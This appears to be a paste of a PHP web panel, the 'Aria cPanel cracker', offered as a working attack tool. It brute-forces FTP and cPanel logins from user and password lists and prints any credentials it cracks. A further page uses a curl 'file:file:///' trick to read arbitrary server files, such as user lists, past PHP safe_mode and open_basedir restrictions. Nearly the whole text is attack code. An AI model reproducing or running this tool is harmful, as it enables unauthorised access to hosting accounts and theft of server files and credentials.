  1561. a:active { outline: none; }
  1562. a:focus { -moz-outline-style: none; }
  1563. </style>
  1564.   <style type='text/css'>
  1565.   <!--
  1566.        A:link {text-decoration: none; color:#cccccc }
  1567.        A:visited {text-decoration: none; color:#cccccc }
  1568.        a:hover {text-decoration: none; color:#000000}
  1569.   -->
  1570. </style>
  1571. <?php
  1572. /* This Code was originaly written by Aria-Security Team [Persian Security Network]
  1573. we are not responsible for any damage/usage done with this script  
  1574.     http://Aria-Security.com
  1575. */
  1576. @ini_set('memory_limit', 1000000000000);
  1577. $connect_timeout=5;
  1578. @set_time_limit(0);
  1579. $submit = $_REQUEST['submit'];
  1580. $users = $_REQUEST['users'];
  1581. $pass = $_REQUEST['passwords'];
  1582. $target = $_REQUEST['target'];
  1583. $option = $_REQUEST['option'];
  1584. $page = $_GET['page'];
  1585.  
  1586. if($target == ''){
  1587. $target = 'localhost';
  1588. }
  1589. ?>
  1590.  
  1591. <?php
  1592.  print "<br><br><br><center><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='70%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td width='70%'>
  1593. <br><b><center><a href='?panel=cp&page=bio'> bio </a> - <a href='?panel=cp&page=crack'> brute </a> - <a href='?panel=cp&page=users'> grab users </a><br><br></center></td></tr></table>";
  1594.  if ( $page == 'bio' ){
  1595. print  
  1596. "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td>
  1597. <br><b>Please enter your USERNAME and PASSWORD to logon<br>
  1598. user<br>
  1599. 220 +ok<br>
  1600. pass ********<br>
  1601. 220 +ok login successful<br>
  1602. [ [email protected] ]# info<b><br><font face=tahoma><br>
  1603. <font color='red' >Aria cPanel cracker version : 1.0 </font><b><br><br>
  1604. Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir bypasser ... more stuff will be included in the next version<br>
  1605. Our website , <a href='http://Aria-security.com'> http://Aria-security.com</a><br>
  1606. </center><br></td></tr></table>";
  1607.  }elseif( $page == 'crack'){
  1608.  // Aria-Security Team [Persian Security Network]
  1609. @ini_set('memory_limit', 1000000000000);
  1610. $connect_timeout=5;
  1611. @set_time_limit(0);
  1612. $submit = $_REQUEST['submit'];
  1613. $users = $_REQUEST['users'];
  1614. $pass = $_REQUEST['passwords'];
  1615. $target = $_REQUEST['target'];
  1616. $option = $_REQUEST['option'];
  1617. if($target == ''){
  1618. $target = 'localhost';
  1619. }
  1620. print " <div align='center'>
  1621. <form method='post' style='border: 1px solid #000000'><br><br>
  1622. <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td>
  1623. <b> Target  : </font><input type='text' name='target' size='16' value= $target style='border: font-family:Verdana; font-weight:bold;'></p></font></b></p>
  1624. <div align='center'><br>
  1625. <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#666666 border=1>
  1626. <tr>
  1627. <td align='center'>
  1628. <b>Username</b></td>
  1629. <td>
  1630. <p align='center'>
  1631. <b>Password</b></td>
  1632. </tr>
  1633. </table>
  1634. <p align='center'>
  1635. <textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$users</textarea>
  1636. <textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$pass</textarea><br>
  1637. <br>                          
  1638. <b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel  
  1639. <input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='brute' name='submit' ></p>
  1640. </td></tr></table></td></tr></form><p align= 'left'>";
  1641. ?>
  1642. <?php
  1643. function ftp_check($host,$user,$pass,$timeout){
  1644. $ch = curl_init();
  1645. curl_setopt($ch, CURLOPT_URL, "ftp://$host");
  1646. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1647. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1648. curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
  1649. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  1650. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  1651. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1652. $data = curl_exec($ch);
  1653. if ( curl_errno($ch) == 28 ) {
  1654.  
  1655. print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
  1656. exit;}
  1657.  
  1658. elseif ( curl_errno($ch) == 0 ){
  1659.  
  1660. print  
  1661. "<b>[ [email protected] ]# </b>
  1662. <b> Attacking has been done , found username , <font color='#FF0000'> $user </font> and password ,  
  1663. <font color='#FF0000'> $pass </font></b><br>";}curl_close($ch);}
  1664.  
  1665. function cpanel_check($host,$user,$pass,$timeout){
  1666. $ch = curl_init();
  1667. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
  1668. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1669. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1670. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  1671. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  1672. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1673. $data = curl_exec($ch);
  1674. if ( curl_errno($ch) == 28 ) {  
  1675. print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
  1676. exit;}
  1677. elseif ( curl_errno($ch) == 0 ){
  1678.  
  1679. print  
  1680. "<b>[ [email protected] ]# </b>
  1681. <b>Attacking has been done , found username , <font color='#FF0000'> $user </font> and password ,  
  1682. <font color='#FF0000'> $pass </font></b><br>";}curl_close($ch);}
  1683.  
  1684. if(isset($submit) && !empty($submit)){
  1685.  
  1686. $userlist = explode ("\n" , $users );
  1687. $passlist = explode ("\n" , $pass );
  1688. print "<b>[ [email protected] ]# Attacking ...</font></b><br>";
  1689. foreach ($userlist as $user) {
  1690. $_user = trim($user);
  1691. foreach ($passlist as $password ) {
  1692. $_pass = trim($password);
  1693. if($option == "ftp"){
  1694. ftp_check($target,$_user,$_pass,$connect_timeout);
  1695. }
  1696. if ($option == "cpanel")
  1697. {
  1698. cpanel_check($target,$_user,$_pass,$connect_timeout);
  1699. }
  1700. }
  1701. }
  1702. }
  1703. }elseif ( $page == 'users'){
  1704. echo "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td>";
  1705. echo '<p><form name="form" action="" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hardstylez" value="grab !"></form>';
  1706. $file = $_POST['file'];
  1707. $level=0;
  1708. if(!file_exists("file:"))
  1709.     @mkdir("file:");
  1710. @chdir("file:");
  1711. $level++;
  1712.  
  1713. $hardstyle = @explode("/", $file); // A R I A  
  1714.  
  1715. for($a=0;$a<count($hardstyle);$a++){
  1716.     if(!empty($hardstyle[$a])){
  1717.         if(!file_exists($hardstyle[$a]))  
  1718.             @mkdir($hardstyle[$a]);
  1719.         @chdir($hardstyle[$a]);
  1720.         $level++;
  1721.     }
  1722. }
  1723. while($level--) chdir("..");
  1724. $ch = curl_init();
  1725. curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
  1726. echo "<textarea rows='30' cols='120' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >";
  1727. if(FALSE==curl_exec($ch))
  1728. die('Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');
  1729. echo ' </textarea> </FONT>';
  1730. curl_close($ch);
  1731. print '</table>';
  1732. }
  1733. ?>
Add Comment
Please, Sign In to add comment